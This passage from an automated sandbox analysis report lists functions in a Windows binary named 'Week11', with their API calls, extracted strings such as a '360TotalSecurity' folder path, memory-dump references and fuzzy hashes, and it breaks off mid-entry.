                                • Opcode ID: ecf94a62f26eeacc0b3ac7c39fde8e4ec8b901517570cba37ac92dc8c8cd249a
                                • Instruction ID: 92d63199bf3ba3bd1b39ea87b3f604ecff6bdd8f92319aed1bb14121758a28bc
                                • Opcode Fuzzy Hash: ecf94a62f26eeacc0b3ac7c39fde8e4ec8b901517570cba37ac92dc8c8cd249a
                                • Instruction Fuzzy Hash: 11019672A4021867DB24DA6D9C81FEBB7ECDF98B21F044156FA04AF384D5E5DC4087A4
                                Function 0046E380 Relevance: 6.1, APIs: 4, Instructions: 57windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageW.USER32(?,0000110A,00000003,?), ref: 0046E3A2
                                • SendMessageW.USER32(?,0000110A,00000003,?), ref: 0046E3C3
                                • SendMessageW.USER32(?,0000113F,00000000,?), ref: 0046E3F1
                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 0046E3FF
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID:
                                • API String ID: 3850602802-0
                                • Opcode ID: 7d47e92251a524073868a7c109d101777243e95e9591a6cadf10de374a7af106
                                • Instruction ID: a8aca7fbe68f332f40261ef60b8dbba9274b1c905ece51679bbb8e48558e1265
                                • Opcode Fuzzy Hash: 7d47e92251a524073868a7c109d101777243e95e9591a6cadf10de374a7af106
                                • Instruction Fuzzy Hash: 2C118275A003186BEB10DFA9DC85EDABBECAF58750F008115FA04AB280D6B4D9018BA4
                                Function 0046E000 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                Download Yara Rule
                                APIs
                                • _memset.LIBCMT ref: 0046E029
                                • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,?), ref: 0046E040
                                • PathAddBackslashW.SHLWAPI(?), ref: 0046E051
                                • _wcsnlen.LIBCMT ref: 0046E063
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Path$BackslashFolder_memset_wcsnlen
                                • String ID:
                                • API String ID: 355466527-0
                                • Opcode ID: 7a33fdecb9513258b2daa65a6f1328a7f924869bcfe40f651878746a35876be4
                                • Instruction ID: c3c8c16ad6002ca8db4496610c8fa53d1dc55c311b100ebd92f6ba53468d5b16
                                • Opcode Fuzzy Hash: 7a33fdecb9513258b2daa65a6f1328a7f924869bcfe40f651878746a35876be4
                                • Instruction Fuzzy Hash: B4014875A4031C67EB20DB719C46FEF73B89B14700F50099EB705962C1E6F4AA848B9D
                                Function 0049E4E5 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                • String ID:
                                • API String ID: 3016257755-0
                                • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                • Instruction ID: 2b3d422230432c192b45f569dd11a878a4019c89b8cafb0b6d0be2bf1e6fd384
                                • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                • Instruction Fuzzy Hash: BF11837204014EFBCF129EC6DC01CEE3F22BB18368B598426FE1859131D63ACA71AB85
                                Function 004866D5 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                Download Yara Rule
                                APIs
                                • GetDlgItem.USER32(?,?), ref: 004866E2
                                • GetTopWindow.USER32(00000000), ref: 004866F5
                                  • Part of subcall function 004866D5: GetWindow.USER32(00000000,00000002), ref: 0048673C
                                • GetTopWindow.USER32(?), ref: 00486725
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Window$Item
                                • String ID:
                                • API String ID: 369458955-0
                                • Opcode ID: 68d7a8da34205e048657e9c06a100d379f07f8b96ddc92c88d742dd533d4e848
                                • Instruction ID: 1c32d4620a6206c68789083f241b8cf28c369af0658d722bbae67bfb0c664882
                                • Opcode Fuzzy Hash: 68d7a8da34205e048657e9c06a100d379f07f8b96ddc92c88d742dd533d4e848
                                • Instruction Fuzzy Hash: 09014F3200162AB7DF633F668C09E9F3A59AF543A8F06492AFD1455210DB39C911DBED
                                Function 0047AA80 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                Download Yara Rule
                                APIs
                                • OpenProcess.KERNEL32(00000001,00000000,00000000,0040140D,00401337), ref: 0047AA8E
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 0047AAA2
                                • CloseHandle.KERNEL32(00000000), ref: 0047AAAD
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Process$CloseHandleOpenTerminate
                                • String ID:
                                • API String ID: 2026632969-0
                                • Opcode ID: 07baf951e1c1d32a9b289b9a63a86d629f90816581076803e4e0c2f07b621e7c
                                • Instruction ID: e32e3ce7148e40f4c7755fa9f2131d3cb9b82d0eb1932f3404be977840ee2a0e
                                • Opcode Fuzzy Hash: 07baf951e1c1d32a9b289b9a63a86d629f90816581076803e4e0c2f07b621e7c
                                • Instruction Fuzzy Hash: 9FE04F354022306BDA2027387D0DBEF37885B46BB1F155351FD26962E08B55489BD6AA
                                Function 004268F0 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 479COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ClearVariant
                                • String ID: tip:$xK
                                • API String ID: 1473721057-3914292583
                                • Opcode ID: cfe65434e61dabe73e7bdbfde77a0d517a24546f6981b8ce282e4c2b2f3a59fd
                                • Instruction ID: c63cff6a0237a891473ee878d2458deaf71263266a40017f2bb62b9b39f3b64e
                                • Opcode Fuzzy Hash: cfe65434e61dabe73e7bdbfde77a0d517a24546f6981b8ce282e4c2b2f3a59fd
                                • Instruction Fuzzy Hash: 0102C371B00119DFDB00DFA9C880BEEB7B5AF99314F64815DE514AB391CB39AE05CBA4
                                Function 00440240 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 457COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: AXWIN
                                • API String ID: 0-1948516679
                                • Opcode ID: 758e0e0f1fe1718a73692213017736f8edb31cdad68be6d343334c2c001d2bc1
                                • Instruction ID: 44e0a74f98a3ad07866d65f659633ba2282cdbadd91c1263810b1026f8ecc6a9
                                • Opcode Fuzzy Hash: 758e0e0f1fe1718a73692213017736f8edb31cdad68be6d343334c2c001d2bc1
                                • Instruction Fuzzy Hash: E6020574600705AFEB14DFA8C880F6BB7A9FF89304F20895DEA699B390D775E911CB50
                                Function 0045A840 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 455COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0044C640: std::_Lockit::_Lockit.LIBCPMT ref: 0044C651
                                  • Part of subcall function 0045D340: std::_Lockit::_Lockit.LIBCPMT ref: 0045D36C
                                  • Part of subcall function 0045D340: std::_Lockit::_Lockit.LIBCPMT ref: 0045D38F
                                  • Part of subcall function 0044BC60: std::_Lockit::_Lockit.LIBCPMT ref: 0044BC70
                                • _localeconv.LIBCMT ref: 0045A8E1
                                • _strcspn.LIBCMT ref: 0045A9FC
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: LockitLockit::_std::_$_localeconv_strcspn
                                • String ID: e
                                • API String ID: 331173946-4024072794
                                • Opcode ID: 365ca3d9b6c8385756e30168abca7fc9ce130e11c21cb565a6444df39ee1151e
                                • Instruction ID: 460df75306ccaae4a8be6dae26e504ebc6c158edf0c799e3b896ceea4de7fa7d
                                • Opcode Fuzzy Hash: 365ca3d9b6c8385756e30168abca7fc9ce130e11c21cb565a6444df39ee1151e
                                • Instruction Fuzzy Hash: D3028E71A002489FCB04DF99C980ADEBBF5EF8D304F15826AF809AB352D734AD45CB95
                                Function 004522B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON
                                Download Yara Rule
                                APIs
                                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0045242C
                                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00452493
                                  • Part of subcall function 004A7F61: std::ios_base::_Tidy.LIBCPMT ref: 004A7F86
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: std::ios_base::_$Ios_base_dtor$Tidy
                                • String ID: ' is not a number.
                                • API String ID: 1660919132-698141950
                                • Opcode ID: 4c65b3d8a94d71f396607c29b69c666f2393f0840463bcdab7b7a05c3bfc3cfe
                                • Instruction ID: 127e038c3c670db67ceb8761e47593868cba54f79e17a5f4c7929c39934a4a58
                                • Opcode Fuzzy Hash: 4c65b3d8a94d71f396607c29b69c666f2393f0840463bcdab7b7a05c3bfc3cfe
                                • Instruction Fuzzy Hash: 8B6181B1D002589FCB10DFA9C941BDDFBB4AF19304F14816FE90967242D7B89A48CBA5
                                Function 004586E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: swprintf
                                • String ID: %$+
                                • API String ID: 233258989-2626897407
                                • Opcode ID: 627356d71b5e65f04b9fba9a5f5aa2c0f8e03a6f391fd59ea5aead6830c7295b
                                • Instruction ID: ca216fb2ccd0806d6bb8efb6b476fbe039f35d0fd5b0fbaa41d4beba8469aabd
                                • Opcode Fuzzy Hash: 627356d71b5e65f04b9fba9a5f5aa2c0f8e03a6f391fd59ea5aead6830c7295b
                                • Instruction Fuzzy Hash: BC518C73E043005AD715AA18CC847DB7BE4EB45382F30195EED81A3393EE6D88498BCE
                                Function 004588B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 160COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: swprintf
                                • String ID: %$+
                                • API String ID: 233258989-2626897407
                                • Opcode ID: bd9d978fbc67a3f7114ba393e284419a1a3adbd57fa90a57254f2341b8e756fd
                                • Instruction ID: 229c02cc651a8cb155adca296aef01cde620da0f872926c806c2b37376d29a85
                                • Opcode Fuzzy Hash: bd9d978fbc67a3f7114ba393e284419a1a3adbd57fa90a57254f2341b8e756fd
                                • Instruction Fuzzy Hash: 0E516FB2A083409BD7159A18C8847EB7BE4FB45341F20495EFD81A3393EF6D8C49879B
                                Function 00462240 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 118windowCOMMON
                                Download Yara Rule
                                APIs
                                • PostMessageW.USER32(?,00000401,00000000,00000000), ref: 00462334
                                • PostMessageW.USER32(00000000,00000403,00000000,00000000), ref: 0046234E
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID: T9N
                                • API String ID: 410705778-185908819
                                • Opcode ID: 864143ef437329f9c4ced060eda4cbc7039652118eb00f0be0ed5f6e2f024b29
                                • Instruction ID: e620361aaaec6b45d06e3cf0956ed295eeddacf8bf0858373358f6c422f466ef
                                • Opcode Fuzzy Hash: 864143ef437329f9c4ced060eda4cbc7039652118eb00f0be0ed5f6e2f024b29
                                • Instruction Fuzzy Hash: 97419EB1600A04AFD714CF69CC91F5AB3A4FB85320F10876EE9259B3E1E775E901CB98
                                Function 0047C060 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                                Download Yara Rule
                                APIs
                                • _memset.LIBCMT ref: 0047C0B1
                                • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?,1D1D1D8C), ref: 0047C0C3
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: FolderPath_memset
                                • String ID: \360TotalSecurity
                                • API String ID: 3318179493-2332581644
                                • Opcode ID: 206c846eed456e622a80b911157f6773412a33d1273f63c3d9b5ed6e7ae78139
                                • Instruction ID: 33d1853786ce610a4019087d8bcb722d3f345c4a8efe477e8a07a1bb4625ea7b
                                • Opcode Fuzzy Hash: 206c846eed456e622a80b911157f6773412a33d1273f63c3d9b5ed6e7ae78139
                                • Instruction Fuzzy Hash: D131A4B16143409BD310EF25D8C5BABB7E9EF88714F80493FF44997291DB3C99048B9A
                                Function 00468590 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: _wcsrchr
                                • String ID: T9N$T9N
                                • API String ID: 1752292252-1430650303
                                • Opcode ID: 4f867a5eacb5ccc313b5dd05eec72df660476cc185299ef4c483ceed8b102571
                                • Instruction ID: 3907a6aad81c414dc0ec16ccaffdfb23846f3fb0f01909b07169201c7ac1546f
                                • Opcode Fuzzy Hash: 4f867a5eacb5ccc313b5dd05eec72df660476cc185299ef4c483ceed8b102571
                                • Instruction Fuzzy Hash: F33173B1A00605AFDB00DF6DCC41B9EF7E5EF94320F15866AE814DB392DB759A008B95
                                Function 0044E6E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON
                                Download Yara Rule
                                APIs
                                • _malloc.LIBCMT ref: 0044E754
                                  • Part of subcall function 0044E9D0: __CxxThrowException@8.LIBCMT ref: 0044E9F0
                                Strings
                                • in Json::Value::duplicateAndPrefixStringValue(): length too big for prefixing, xrefs: 0044E724
                                • in Json::Value::duplicateAndPrefixStringValue(): Failed to allocate string value buffer, xrefs: 0044E764
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Exception@8Throw_malloc
                                • String ID: in Json::Value::duplicateAndPrefixStringValue(): Failed to allocate string value buffer$in Json::Value::duplicateAndPrefixStringValue(): length too big for prefixing
                                • API String ID: 3476970888-1516562270
                                • Opcode ID: 92b539ca3e0c5f6cc4ab3c9f73a5a429e92e7529c36422e3158b58293769a5b0
                                • Instruction ID: 6f7c2c4555c5b928909773d5385ec3f0d00b2ad257d6945f7a4d35fc53a13465
